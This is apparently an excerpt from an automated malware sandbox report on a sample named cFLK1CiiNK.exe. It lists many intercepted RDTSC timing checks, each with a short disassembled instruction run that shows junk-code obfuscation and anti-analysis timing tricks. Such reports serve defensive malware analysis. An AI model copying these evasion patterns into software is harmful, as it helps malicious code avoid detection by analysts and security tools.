                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400779 second address: 540077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540077D second address: 54007C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F61286B717Ah 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov bh, al 0x00000014 mov dx, DC2Eh 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c pushad 0x0000001d push ebx 0x0000001e mov al, F3h 0x00000020 pop edi 0x00000021 jmp 00007F61286B7188h 0x00000026 popad 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push ebx 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54007C5 second address: 54007D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54007D4 second address: 5400800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F61286B7184h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F61286B717Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400800 second address: 5400806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54008E1 second address: 53F0022 instructions: 0x00000000 rdtsc 0x00000002 mov ch, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, al 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov edi, 7801BB54h 0x00000010 pushfd 0x00000011 jmp 00007F61286B717Dh 0x00000016 or eax, 47005616h 0x0000001c jmp 00007F61286B7181h 0x00000021 popfd 0x00000022 popad 0x00000023 leave 0x00000024 pushad 0x00000025 mov ax, 2623h 0x00000029 call 00007F61286B7188h 0x0000002e pushfd 0x0000002f jmp 00007F61286B7182h 0x00000034 add ch, FFFFFF98h 0x00000037 jmp 00007F61286B717Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f retn 0004h 0x00000042 nop 0x00000043 sub esp, 04h 0x00000046 xor ebx, ebx 0x00000048 cmp eax, 00000000h 0x0000004b je 00007F61286B72DAh 0x00000051 mov dword ptr [esp], 0000000Dh 0x00000058 call 00007F612CFD3311h 0x0000005d mov edi, edi 0x0000005f jmp 00007F61286B717Bh 0x00000064 xchg eax, ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F61286B7180h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0022 second address: 53F0031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0031 second address: 53F0037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0037 second address: 53F003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F003B second address: 53F003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F003F second address: 53F0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov ch, dl 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0050 second address: 53F00CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov ch, 37h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F61286B717Bh 0x00000012 and esi, 6501D62Eh 0x00000018 jmp 00007F61286B7189h 0x0000001d popfd 0x0000001e jmp 00007F61286B7180h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F61286B7180h 0x0000002b sub esp, 2Ch 0x0000002e jmp 00007F61286B7180h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F61286B717Ah 0x0000003d rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F00CD second address: 53F00D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F00D1 second address: 53F00D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F01AE second address: 53F01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F01C6 second address: 53F01EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007F61286B717Ch 0x00000012 sub edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F61286B717Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F01EF second address: 53F021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov cx, EAD9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d inc ebx 0x0000000e pushad 0x0000000f jmp 00007F612923D912h 0x00000014 mov eax, 43E62B81h 0x00000019 popad 0x0000001a test al, al 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F021E second address: 53F0222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0222 second address: 53F0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0226 second address: 53F022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F022C second address: 53F0250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F612923DB38h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 mov dx, 680Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F02F8 second address: 53F0332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F61286B7183h 0x00000012 mov esi, 542D827Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0332 second address: 53F0355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F612923D918h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0355 second address: 53F035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F035B second address: 53F035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F035F second address: 53F0363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0363 second address: 53F0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F612923D914h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F03C7 second address: 53F03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F03CB second address: 53F03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F03E8 second address: 53F0407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 95h 0x00000005 mov dh, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F61286B71F6h 0x00000010 pushad 0x00000011 mov cl, dl 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0407 second address: 53F040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F040B second address: 53F040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F040F second address: 53F0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0415 second address: 53F04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B7186h 0x00000009 adc ah, FFFFFFA8h 0x0000000c jmp 00007F61286B717Bh 0x00000011 popfd 0x00000012 mov ch, 57h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jne 00007F6198D251CEh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F61286B7181h 0x00000024 sbb esi, 3C37C0C6h 0x0000002a jmp 00007F61286B7181h 0x0000002f popfd 0x00000030 mov di, si 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov edx, 0CE8325Ah 0x0000003f pushfd 0x00000040 jmp 00007F61286B717Bh 0x00000045 jmp 00007F61286B7183h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F04A4 second address: 53F04AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E5BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F04AD second address: 53F051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-2Ch] 0x0000000a jmp 00007F61286B7187h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F61286B717Bh 0x00000019 or al, FFFFFFBEh 0x0000001c jmp 00007F61286B7189h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F61286B7180h 0x00000028 sbb al, FFFFFFB8h 0x0000002b jmp 00007F61286B717Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F051C second address: 53F0571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F612923D917h 0x00000010 mov cx, 9CBFh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F612923D912h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0571 second address: 53F0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0575 second address: 53F0592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0592 second address: 53F05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F61286B7181h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05C0 second address: 53F05C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05C6 second address: 53F05E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05E3 second address: 53F05E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05E7 second address: 53F05EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05EB second address: 53F05F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F05F1 second address: 53F0610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0610 second address: 53F0614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0614 second address: 53F061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F061A second address: 53F0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D912h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0630 second address: 53F0634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0668 second address: 53F066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F066C second address: 53F0672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0672 second address: 53F06A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 mov ebx, 6276AB30h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F612923D90Eh 0x0000001b and cl, 00000078h 0x0000001e jmp 00007F612923D90Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F06A6 second address: 53F06DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F61286B717Fh 0x00000008 pop ecx 0x00000009 jmp 00007F61286B7189h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test esi, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F06DD second address: 53E0E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F61998AB873h 0x00000011 xor eax, eax 0x00000013 jmp 00007F612921703Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 sub esp, 04h 0x00000023 mov esi, eax 0x00000025 xor ebx, ebx 0x00000027 cmp esi, 00000000h 0x0000002a je 00007F612923DA45h 0x00000030 call 00007F612DB4A766h 0x00000035 mov edi, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bl, al 0x0000003c mov ecx, ebx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53E0E24 second address: 53E0E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, CEh 0x00000005 jmp 00007F61286B7189h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F61286B717Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F61286B717Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53E0E65 second address: 53E0E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53E0E77 second address: 53E0E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53E0E7B second address: 53E0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F612923D913h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53E0F2E second address: 53E0F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0B9A second address: 53F0BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D917h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F612923D916h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F612923D910h 0x00000016 cmp dword ptr [75AB459Ch], 05h 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 je 00007F619989B719h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0BF8 second address: 53F0C06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0CFC second address: 53F0D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e popad 0x0000000f call 00007F61998A2759h 0x00000014 push 75A52B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [75AB4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 jmp 00007F612923D912h 0x0000005e sub esi, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0D3E second address: 53F0D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0D58 second address: 53F0D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0D5E second address: 53F0D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F61286B717Ah 0x00000017 sbb eax, 323808B8h 0x0000001d jmp 00007F61286B717Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0DFA second address: 53F0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0E12 second address: 53F0E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F61286B7184h 0x00000014 xor ax, 7968h 0x00000019 jmp 00007F61286B717Bh 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 je 00007F6198D0ACABh 0x00000029 pushad 0x0000002a jmp 00007F61286B7181h 0x0000002f pushfd 0x00000030 jmp 00007F61286B7180h 0x00000035 xor ah, FFFFFFF8h 0x00000038 jmp 00007F61286B717Bh 0x0000003d popfd 0x0000003e popad 0x0000003f cmp dword ptr [ebp+08h], 00002000h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0E96 second address: 53F0E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 53F0E9A second address: 53F0EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400973 second address: 5400997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 33C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F612923D915h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 5400997 second address: 54009CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F61286B7188h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 54009CB second address: 54009D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cFLK1CiiNK.exe RDTSC instruction interceptor: First address: 54009D1 second address: 54009EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
